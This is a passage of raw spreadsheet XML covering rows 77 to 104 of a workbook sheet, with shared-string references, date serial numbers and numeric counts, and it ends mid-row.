        <v>415</v>
      </c>
      <c r="H77" t="s">
        <v>416</v>
      </c>
      <c r="I77" t="s">
        <v>172</v>
      </c>
      <c r="J77" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K77" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L77" t="s">
        <v>77</v>
      </c>
      <c r="M77" s="95" t="s">
        <v>406</v>
      </c>
      <c r="N77" t="s">
        <v>407</v>
      </c>
      <c r="Q77" s="95" t="s">
        <v>413</v>
      </c>
      <c r="R77">
        <v>11994</v>
      </c>
      <c r="S77">
        <v>11289</v>
      </c>
      <c r="T77">
        <v>9665</v>
      </c>
      <c r="U77">
        <v>8328</v>
      </c>
      <c r="V77">
        <v>12524</v>
      </c>
      <c r="W77" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="78" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A78" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B78" s="52">
        <v>44473.722917129628</v>
      </c>
      <c r="C78" s="95" t="s">
        <v>409</v>
      </c>
      <c r="D78" s="96">
        <v>111</v>
      </c>
      <c r="E78" s="95" t="s">
        <v>417</v>
      </c>
      <c r="F78" s="42">
        <v>111</v>
      </c>
      <c r="G78" s="95" t="s">
        <v>418</v>
      </c>
      <c r="H78" t="s">
        <v>419</v>
      </c>
      <c r="I78" t="s">
        <v>172</v>
      </c>
      <c r="J78" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K78" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L78" t="s">
        <v>77</v>
      </c>
      <c r="M78" s="95" t="s">
        <v>406</v>
      </c>
      <c r="N78" t="s">
        <v>407</v>
      </c>
      <c r="Q78" s="95" t="s">
        <v>413</v>
      </c>
      <c r="R78">
        <v>11922</v>
      </c>
      <c r="S78">
        <v>11141</v>
      </c>
      <c r="T78">
        <v>9679</v>
      </c>
      <c r="U78">
        <v>8338</v>
      </c>
      <c r="V78">
        <v>12483</v>
      </c>
      <c r="W78" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="79" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A79" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B79" s="52">
        <v>44415.434837349538</v>
      </c>
      <c r="C79" s="95" t="s">
        <v>402</v>
      </c>
      <c r="D79" s="96">
        <v>101</v>
      </c>
      <c r="E79" s="95" t="s">
        <v>420</v>
      </c>
      <c r="F79" s="42">
        <v>101</v>
      </c>
      <c r="G79" s="95" t="s">
        <v>421</v>
      </c>
      <c r="H79" t="s">
        <v>422</v>
      </c>
      <c r="I79" t="s">
        <v>172</v>
      </c>
      <c r="J79" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K79" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L79" t="s">
        <v>77</v>
      </c>
      <c r="M79" s="95" t="s">
        <v>406</v>
      </c>
      <c r="N79" t="s">
        <v>407</v>
      </c>
      <c r="Q79" s="95" t="s">
        <v>408</v>
      </c>
      <c r="R79">
        <v>5947313</v>
      </c>
      <c r="S79">
        <v>8781649</v>
      </c>
      <c r="T79">
        <v>12202895</v>
      </c>
      <c r="U79">
        <v>13129075</v>
      </c>
      <c r="V79">
        <v>14781955</v>
      </c>
      <c r="W79" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="80" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A80" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B80" s="52">
        <v>44415.434867129632</v>
      </c>
      <c r="C80" s="95" t="s">
        <v>423</v>
      </c>
      <c r="D80" s="96">
        <v>101</v>
      </c>
      <c r="E80" s="95" t="s">
        <v>424</v>
      </c>
      <c r="F80" s="42">
        <v>101</v>
      </c>
      <c r="G80" s="95" t="s">
        <v>425</v>
      </c>
      <c r="H80" t="s">
        <v>426</v>
      </c>
      <c r="I80" t="s">
        <v>172</v>
      </c>
      <c r="J80" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K80" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L80" t="s">
        <v>77</v>
      </c>
      <c r="M80" s="95" t="s">
        <v>406</v>
      </c>
      <c r="N80" t="s">
        <v>407</v>
      </c>
      <c r="Q80" s="95" t="s">
        <v>427</v>
      </c>
      <c r="R80">
        <v>368700</v>
      </c>
      <c r="S80">
        <v>538061</v>
      </c>
      <c r="T80">
        <v>711026</v>
      </c>
      <c r="U80">
        <v>763093</v>
      </c>
      <c r="V80">
        <v>836492</v>
      </c>
      <c r="W80" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="81" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A81" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B81" s="52">
        <v>44415.434867094904</v>
      </c>
      <c r="C81" s="95" t="s">
        <v>423</v>
      </c>
      <c r="D81" s="96">
        <v>101</v>
      </c>
      <c r="E81" s="95" t="s">
        <v>428</v>
      </c>
      <c r="F81" s="42">
        <v>101</v>
      </c>
      <c r="G81" s="95" t="s">
        <v>429</v>
      </c>
      <c r="H81" t="s">
        <v>430</v>
      </c>
      <c r="I81" t="s">
        <v>172</v>
      </c>
      <c r="J81" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K81" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L81" t="s">
        <v>77</v>
      </c>
      <c r="M81" s="95" t="s">
        <v>406</v>
      </c>
      <c r="N81" t="s">
        <v>407</v>
      </c>
      <c r="Q81" s="95" t="s">
        <v>427</v>
      </c>
      <c r="R81">
        <v>94559</v>
      </c>
      <c r="S81">
        <v>132745</v>
      </c>
      <c r="T81">
        <v>147349</v>
      </c>
      <c r="U81">
        <v>156828</v>
      </c>
      <c r="V81">
        <v>171153</v>
      </c>
      <c r="W81" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="82" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A82" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B82" s="52">
        <v>44415.434867118056</v>
      </c>
      <c r="C82" s="95" t="s">
        <v>423</v>
      </c>
      <c r="D82" s="96">
        <v>101</v>
      </c>
      <c r="E82" s="95" t="s">
        <v>431</v>
      </c>
      <c r="F82" s="42">
        <v>101</v>
      </c>
      <c r="G82" s="95" t="s">
        <v>432</v>
      </c>
      <c r="H82" t="s">
        <v>433</v>
      </c>
      <c r="I82" t="s">
        <v>172</v>
      </c>
      <c r="J82" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K82" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L82" t="s">
        <v>77</v>
      </c>
      <c r="M82" s="95" t="s">
        <v>406</v>
      </c>
      <c r="N82" t="s">
        <v>407</v>
      </c>
      <c r="Q82" s="95" t="s">
        <v>427</v>
      </c>
      <c r="R82">
        <v>149028</v>
      </c>
      <c r="S82">
        <v>229099</v>
      </c>
      <c r="T82">
        <v>272763</v>
      </c>
      <c r="U82">
        <v>327707</v>
      </c>
      <c r="V82">
        <v>370283</v>
      </c>
      <c r="W82" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="83" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A83" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B83" s="52">
        <v>44510.422827465278</v>
      </c>
      <c r="C83" s="95" t="s">
        <v>434</v>
      </c>
      <c r="D83" s="96">
        <v>101</v>
      </c>
      <c r="E83" s="95" t="s">
        <v>435</v>
      </c>
      <c r="F83" s="42">
        <v>100</v>
      </c>
      <c r="G83" s="95" t="s">
        <v>436</v>
      </c>
      <c r="H83" t="s">
        <v>437</v>
      </c>
      <c r="I83" t="s">
        <v>156</v>
      </c>
      <c r="J83" s="95" t="s">
        <v>438</v>
      </c>
      <c r="K83" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L83" t="s">
        <v>77</v>
      </c>
      <c r="M83" s="95" t="s">
        <v>158</v>
      </c>
      <c r="Q83" s="95" t="s">
        <v>439</v>
      </c>
      <c r="U83">
        <v>73</v>
      </c>
      <c r="V83">
        <v>13435</v>
      </c>
      <c r="W83" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="84" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A84" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B84" s="52">
        <v>44510.422827442133</v>
      </c>
      <c r="C84" s="95" t="s">
        <v>434</v>
      </c>
      <c r="D84" s="96">
        <v>101</v>
      </c>
      <c r="E84" s="95" t="s">
        <v>440</v>
      </c>
      <c r="F84" s="42">
        <v>101</v>
      </c>
      <c r="G84" s="95" t="s">
        <v>441</v>
      </c>
      <c r="H84" t="s">
        <v>442</v>
      </c>
      <c r="I84" t="s">
        <v>156</v>
      </c>
      <c r="J84" s="95" t="s">
        <v>438</v>
      </c>
      <c r="K84" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L84" t="s">
        <v>77</v>
      </c>
      <c r="M84" s="95" t="s">
        <v>158</v>
      </c>
      <c r="Q84" s="95" t="s">
        <v>439</v>
      </c>
      <c r="R84">
        <v>2980</v>
      </c>
      <c r="S84">
        <v>2782</v>
      </c>
      <c r="T84">
        <v>2423</v>
      </c>
      <c r="U84">
        <v>2123</v>
      </c>
      <c r="V84">
        <v>2366</v>
      </c>
      <c r="W84" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="85" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A85" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B85" s="52">
        <v>44510.422827476854</v>
      </c>
      <c r="C85" s="95" t="s">
        <v>434</v>
      </c>
      <c r="D85" s="96">
        <v>101</v>
      </c>
      <c r="E85" s="95" t="s">
        <v>443</v>
      </c>
      <c r="F85" s="42">
        <v>101</v>
      </c>
      <c r="G85" s="95" t="s">
        <v>444</v>
      </c>
      <c r="H85" t="s">
        <v>445</v>
      </c>
      <c r="I85" t="s">
        <v>156</v>
      </c>
      <c r="J85" s="95" t="s">
        <v>438</v>
      </c>
      <c r="K85" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L85" t="s">
        <v>77</v>
      </c>
      <c r="M85" s="95" t="s">
        <v>158</v>
      </c>
      <c r="Q85" s="95" t="s">
        <v>439</v>
      </c>
      <c r="R85">
        <v>2979</v>
      </c>
      <c r="S85">
        <v>2783</v>
      </c>
      <c r="T85">
        <v>2312</v>
      </c>
      <c r="U85">
        <v>2126</v>
      </c>
      <c r="V85">
        <v>2382</v>
      </c>
      <c r="W85" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="86" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A86" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B86" s="52">
        <v>44510.422827407405</v>
      </c>
      <c r="C86" s="95" t="s">
        <v>434</v>
      </c>
      <c r="D86" s="96">
        <v>101</v>
      </c>
      <c r="E86" s="95" t="s">
        <v>446</v>
      </c>
      <c r="F86" s="42">
        <v>101</v>
      </c>
      <c r="G86" s="95" t="s">
        <v>447</v>
      </c>
      <c r="H86" t="s">
        <v>448</v>
      </c>
      <c r="I86" t="s">
        <v>156</v>
      </c>
      <c r="J86" s="95" t="s">
        <v>438</v>
      </c>
      <c r="K86" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L86" t="s">
        <v>77</v>
      </c>
      <c r="M86" s="95" t="s">
        <v>158</v>
      </c>
      <c r="Q86" s="95" t="s">
        <v>439</v>
      </c>
      <c r="R86">
        <v>2982</v>
      </c>
      <c r="S86">
        <v>2777</v>
      </c>
      <c r="T86">
        <v>2430</v>
      </c>
      <c r="U86">
        <v>2128</v>
      </c>
      <c r="V86">
        <v>2373</v>
      </c>
      <c r="W86" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="87" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A87" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B87" s="52">
        <v>44510.422827453702</v>
      </c>
      <c r="C87" s="95" t="s">
        <v>434</v>
      </c>
      <c r="D87" s="96">
        <v>101</v>
      </c>
      <c r="E87" s="95" t="s">
        <v>449</v>
      </c>
      <c r="F87" s="42">
        <v>101</v>
      </c>
      <c r="G87" s="95" t="s">
        <v>450</v>
      </c>
      <c r="H87" t="s">
        <v>451</v>
      </c>
      <c r="I87" t="s">
        <v>156</v>
      </c>
      <c r="J87" s="95" t="s">
        <v>438</v>
      </c>
      <c r="K87" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L87" t="s">
        <v>77</v>
      </c>
      <c r="M87" s="95" t="s">
        <v>158</v>
      </c>
      <c r="Q87" s="95" t="s">
        <v>439</v>
      </c>
      <c r="R87">
        <v>2982</v>
      </c>
      <c r="S87">
        <v>2780</v>
      </c>
      <c r="T87">
        <v>2424</v>
      </c>
      <c r="U87">
        <v>2132</v>
      </c>
      <c r="V87">
        <v>2346</v>
      </c>
      <c r="W87" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="88" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A88" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B88" s="52"/>
      <c r="C88" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D88" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E88" s="95" t="s">
        <v>452</v>
      </c>
      <c r="F88" s="42">
        <v>100</v>
      </c>
      <c r="G88" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H88" t="s">
        <v>453</v>
      </c>
      <c r="I88" t="s">
        <v>75</v>
      </c>
      <c r="J88" s="95" t="s">
        <v>454</v>
      </c>
      <c r="K88" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L88" t="s">
        <v>77</v>
      </c>
      <c r="Q88" s="95" t="s">
        <v>455</v>
      </c>
      <c r="W88" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="89" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A89" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B89" s="52"/>
      <c r="C89" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D89" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E89" s="95" t="s">
        <v>456</v>
      </c>
      <c r="F89" s="42">
        <v>100</v>
      </c>
      <c r="G89" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H89" t="s">
        <v>457</v>
      </c>
      <c r="I89" t="s">
        <v>179</v>
      </c>
      <c r="J89" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K89" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L89" t="s">
        <v>77</v>
      </c>
      <c r="Q89" s="95" t="s">
        <v>458</v>
      </c>
      <c r="W89" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="90" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A90" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B90" s="52"/>
      <c r="C90" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D90" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E90" s="95" t="s">
        <v>459</v>
      </c>
      <c r="F90" s="42">
        <v>200</v>
      </c>
      <c r="G90" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H90" t="s">
        <v>460</v>
      </c>
      <c r="I90" t="s">
        <v>103</v>
      </c>
      <c r="J90" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K90" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L90" t="s">
        <v>77</v>
      </c>
      <c r="M90" s="95" t="s">
        <v>104</v>
      </c>
      <c r="P90" t="s">
        <v>246</v>
      </c>
      <c r="Q90" s="95" t="s">
        <v>247</v>
      </c>
      <c r="W90" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="91" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A91" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B91" s="52"/>
      <c r="C91" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D91" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E91" s="95" t="s">
        <v>461</v>
      </c>
      <c r="F91" s="42">
        <v>200</v>
      </c>
      <c r="G91" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H91" t="s">
        <v>462</v>
      </c>
      <c r="I91" t="s">
        <v>103</v>
      </c>
      <c r="J91" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K91" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L91" t="s">
        <v>77</v>
      </c>
      <c r="M91" s="95" t="s">
        <v>104</v>
      </c>
      <c r="P91" t="s">
        <v>246</v>
      </c>
      <c r="Q91" s="95" t="s">
        <v>247</v>
      </c>
      <c r="W91" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="92" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A92" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B92" s="52"/>
      <c r="C92" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D92" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E92" s="95" t="s">
        <v>463</v>
      </c>
      <c r="F92" s="42">
        <v>100</v>
      </c>
      <c r="G92" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H92" t="s">
        <v>464</v>
      </c>
      <c r="I92" t="s">
        <v>75</v>
      </c>
      <c r="J92" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K92" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L92" t="s">
        <v>77</v>
      </c>
      <c r="M92" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N92" t="s">
        <v>91</v>
      </c>
      <c r="Q92" s="95" t="s">
        <v>465</v>
      </c>
      <c r="W92" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="93" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A93" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B93" s="52"/>
      <c r="C93" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D93" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E93" s="95" t="s">
        <v>466</v>
      </c>
      <c r="F93" s="42">
        <v>100</v>
      </c>
      <c r="G93" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H93" t="s">
        <v>467</v>
      </c>
      <c r="I93" t="s">
        <v>103</v>
      </c>
      <c r="J93" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K93" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L93" t="s">
        <v>77</v>
      </c>
      <c r="M93" s="95" t="s">
        <v>104</v>
      </c>
      <c r="P93" t="s">
        <v>246</v>
      </c>
      <c r="Q93" s="95" t="s">
        <v>247</v>
      </c>
      <c r="W93" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="94" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A94" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B94" s="52">
        <v>43665.050422777778</v>
      </c>
      <c r="C94" s="95" t="s">
        <v>468</v>
      </c>
      <c r="D94" s="96">
        <v>210</v>
      </c>
      <c r="E94" s="95" t="s">
        <v>469</v>
      </c>
      <c r="F94" s="42">
        <v>210</v>
      </c>
      <c r="G94" s="95" t="s">
        <v>470</v>
      </c>
      <c r="H94" t="s">
        <v>471</v>
      </c>
      <c r="I94" t="s">
        <v>103</v>
      </c>
      <c r="J94" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K94" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L94" t="s">
        <v>77</v>
      </c>
      <c r="M94" s="95" t="s">
        <v>104</v>
      </c>
      <c r="P94" t="s">
        <v>472</v>
      </c>
      <c r="Q94" s="95" t="s">
        <v>473</v>
      </c>
      <c r="R94">
        <v>1260</v>
      </c>
      <c r="S94">
        <v>427</v>
      </c>
      <c r="W94" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="95" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A95" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B95" s="52">
        <v>43523.642920231483</v>
      </c>
      <c r="C95" s="95" t="s">
        <v>468</v>
      </c>
      <c r="D95" s="96">
        <v>301</v>
      </c>
      <c r="E95" s="95" t="s">
        <v>469</v>
      </c>
      <c r="F95" s="42">
        <v>301</v>
      </c>
      <c r="G95" s="95" t="s">
        <v>470</v>
      </c>
      <c r="H95" t="s">
        <v>474</v>
      </c>
      <c r="I95" t="s">
        <v>156</v>
      </c>
      <c r="J95" s="95" t="s">
        <v>301</v>
      </c>
      <c r="K95" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L95" t="s">
        <v>77</v>
      </c>
      <c r="M95" s="95" t="s">
        <v>475</v>
      </c>
      <c r="N95" t="s">
        <v>476</v>
      </c>
      <c r="O95" s="95" t="s">
        <v>477</v>
      </c>
      <c r="Q95" s="95" t="s">
        <v>478</v>
      </c>
      <c r="W95" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="96" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A96" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B96" s="52">
        <v>43665.050422754626</v>
      </c>
      <c r="C96" s="95" t="s">
        <v>468</v>
      </c>
      <c r="D96" s="96">
        <v>210</v>
      </c>
      <c r="E96" s="95" t="s">
        <v>479</v>
      </c>
      <c r="F96" s="42">
        <v>110</v>
      </c>
      <c r="G96" s="95" t="s">
        <v>480</v>
      </c>
      <c r="H96" t="s">
        <v>481</v>
      </c>
      <c r="I96" t="s">
        <v>103</v>
      </c>
      <c r="J96" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K96" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L96" t="s">
        <v>77</v>
      </c>
      <c r="M96" s="95" t="s">
        <v>104</v>
      </c>
      <c r="O96" s="95" t="s">
        <v>482</v>
      </c>
      <c r="Q96" s="95" t="s">
        <v>473</v>
      </c>
      <c r="W96" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="97" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A97" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B97" s="52">
        <v>43665.050422743057</v>
      </c>
      <c r="C97" s="95" t="s">
        <v>468</v>
      </c>
      <c r="D97" s="96">
        <v>210</v>
      </c>
      <c r="E97" s="95" t="s">
        <v>483</v>
      </c>
      <c r="F97" s="42">
        <v>110</v>
      </c>
      <c r="G97" s="95" t="s">
        <v>484</v>
      </c>
      <c r="H97" t="s">
        <v>485</v>
      </c>
      <c r="I97" t="s">
        <v>103</v>
      </c>
      <c r="J97" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K97" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L97" t="s">
        <v>77</v>
      </c>
      <c r="M97" s="95" t="s">
        <v>104</v>
      </c>
      <c r="O97" s="95" t="s">
        <v>486</v>
      </c>
      <c r="Q97" s="95" t="s">
        <v>473</v>
      </c>
      <c r="W97" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="98" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A98" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B98" s="52">
        <v>43523.642920254628</v>
      </c>
      <c r="C98" s="95" t="s">
        <v>468</v>
      </c>
      <c r="D98" s="96">
        <v>301</v>
      </c>
      <c r="E98" s="95" t="s">
        <v>487</v>
      </c>
      <c r="F98" s="42">
        <v>301</v>
      </c>
      <c r="G98" s="95" t="s">
        <v>488</v>
      </c>
      <c r="H98" t="s">
        <v>489</v>
      </c>
      <c r="I98" t="s">
        <v>156</v>
      </c>
      <c r="J98" s="95" t="s">
        <v>301</v>
      </c>
      <c r="K98" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L98" t="s">
        <v>77</v>
      </c>
      <c r="M98" s="95" t="s">
        <v>475</v>
      </c>
      <c r="N98" t="s">
        <v>476</v>
      </c>
      <c r="O98" s="95" t="s">
        <v>490</v>
      </c>
      <c r="Q98" s="95" t="s">
        <v>478</v>
      </c>
      <c r="W98" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="99" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A99" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B99" s="52">
        <v>43523.64292027778</v>
      </c>
      <c r="C99" s="95" t="s">
        <v>468</v>
      </c>
      <c r="D99" s="96">
        <v>301</v>
      </c>
      <c r="E99" s="95" t="s">
        <v>491</v>
      </c>
      <c r="F99" s="42">
        <v>101</v>
      </c>
      <c r="G99" s="95" t="s">
        <v>492</v>
      </c>
      <c r="H99" t="s">
        <v>493</v>
      </c>
      <c r="I99" t="s">
        <v>156</v>
      </c>
      <c r="J99" s="95" t="s">
        <v>301</v>
      </c>
      <c r="K99" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L99" t="s">
        <v>77</v>
      </c>
      <c r="M99" s="95" t="s">
        <v>475</v>
      </c>
      <c r="N99" t="s">
        <v>476</v>
      </c>
      <c r="O99" s="95" t="s">
        <v>477</v>
      </c>
      <c r="Q99" s="95" t="s">
        <v>478</v>
      </c>
      <c r="W99" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="100" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A100" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B100" s="52">
        <v>44405.484184386572</v>
      </c>
      <c r="C100" s="95" t="s">
        <v>494</v>
      </c>
      <c r="D100" s="96">
        <v>101</v>
      </c>
      <c r="E100" s="95" t="s">
        <v>495</v>
      </c>
      <c r="F100" s="42">
        <v>101</v>
      </c>
      <c r="G100" s="95" t="s">
        <v>496</v>
      </c>
      <c r="H100" t="s">
        <v>497</v>
      </c>
      <c r="I100" t="s">
        <v>156</v>
      </c>
      <c r="J100" s="95" t="s">
        <v>226</v>
      </c>
      <c r="K100" s="95" t="s">
        <v>27</v>
      </c>
      <c r="L100" t="s">
        <v>77</v>
      </c>
      <c r="M100" s="95" t="s">
        <v>308</v>
      </c>
      <c r="N100" t="s">
        <v>309</v>
      </c>
      <c r="O100" s="95" t="s">
        <v>498</v>
      </c>
      <c r="Q100" s="95" t="s">
        <v>499</v>
      </c>
      <c r="R100">
        <v>132</v>
      </c>
      <c r="S100">
        <v>108</v>
      </c>
      <c r="T100">
        <v>49</v>
      </c>
      <c r="U100">
        <v>25490</v>
      </c>
      <c r="V100">
        <v>23469</v>
      </c>
      <c r="W100" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="101" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A101" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B101" s="52">
        <v>44078.504171817127</v>
      </c>
      <c r="C101" s="95" t="s">
        <v>468</v>
      </c>
      <c r="D101" s="96">
        <v>111</v>
      </c>
      <c r="E101" s="95" t="s">
        <v>500</v>
      </c>
      <c r="F101" s="42">
        <v>102</v>
      </c>
      <c r="G101" s="95" t="s">
        <v>501</v>
      </c>
      <c r="H101" t="s">
        <v>502</v>
      </c>
      <c r="I101" t="s">
        <v>156</v>
      </c>
      <c r="J101" s="95" t="s">
        <v>226</v>
      </c>
      <c r="K101" s="95" t="s">
        <v>27</v>
      </c>
      <c r="L101" t="s">
        <v>77</v>
      </c>
      <c r="M101" s="95" t="s">
        <v>308</v>
      </c>
      <c r="N101" t="s">
        <v>309</v>
      </c>
      <c r="O101" s="95" t="s">
        <v>503</v>
      </c>
      <c r="P101" t="s">
        <v>504</v>
      </c>
      <c r="Q101" s="95" t="s">
        <v>505</v>
      </c>
      <c r="R101">
        <v>3959</v>
      </c>
      <c r="S101">
        <v>3054</v>
      </c>
      <c r="T101">
        <v>2848</v>
      </c>
      <c r="U101">
        <v>9892</v>
      </c>
      <c r="V101">
        <v>45574</v>
      </c>
      <c r="W101" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="102" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A102" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B102" s="52">
        <v>43984.696897152775</v>
      </c>
      <c r="C102" s="95" t="s">
        <v>468</v>
      </c>
      <c r="D102" s="96">
        <v>111</v>
      </c>
      <c r="E102" s="95" t="s">
        <v>506</v>
      </c>
      <c r="F102" s="42">
        <v>100</v>
      </c>
      <c r="G102" s="95" t="s">
        <v>507</v>
      </c>
      <c r="H102" t="s">
        <v>508</v>
      </c>
      <c r="I102" t="s">
        <v>156</v>
      </c>
      <c r="J102" s="95" t="s">
        <v>438</v>
      </c>
      <c r="K102" s="95" t="s">
        <v>27</v>
      </c>
      <c r="L102" t="s">
        <v>77</v>
      </c>
      <c r="M102" s="95" t="s">
        <v>509</v>
      </c>
      <c r="N102" t="s">
        <v>510</v>
      </c>
      <c r="O102" s="95" t="s">
        <v>511</v>
      </c>
      <c r="P102" t="s">
        <v>512</v>
      </c>
      <c r="Q102" s="95" t="s">
        <v>505</v>
      </c>
      <c r="W102" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="103" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A103" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B103" s="52"/>
      <c r="C103" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D103" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E103" s="95" t="s">
        <v>513</v>
      </c>
      <c r="F103" s="42">
        <v>100</v>
      </c>
      <c r="G103" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H103" t="s">
        <v>514</v>
      </c>
      <c r="I103" t="s">
        <v>75</v>
      </c>
      <c r="J103" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K103" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L103" t="s">
        <v>77</v>
      </c>
      <c r="M103" s="95" t="s">
        <v>515</v>
      </c>
      <c r="P103" t="s">
        <v>516</v>
      </c>
      <c r="Q103" s="95" t="s">
        <v>517</v>
      </c>
      <c r="W103" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="104" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A104" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B104" s="52">
        <v>44433.528511863427</v>
      </c>
      <c r="C104" s="95" t="s">
        <v>518</v>
      </c>
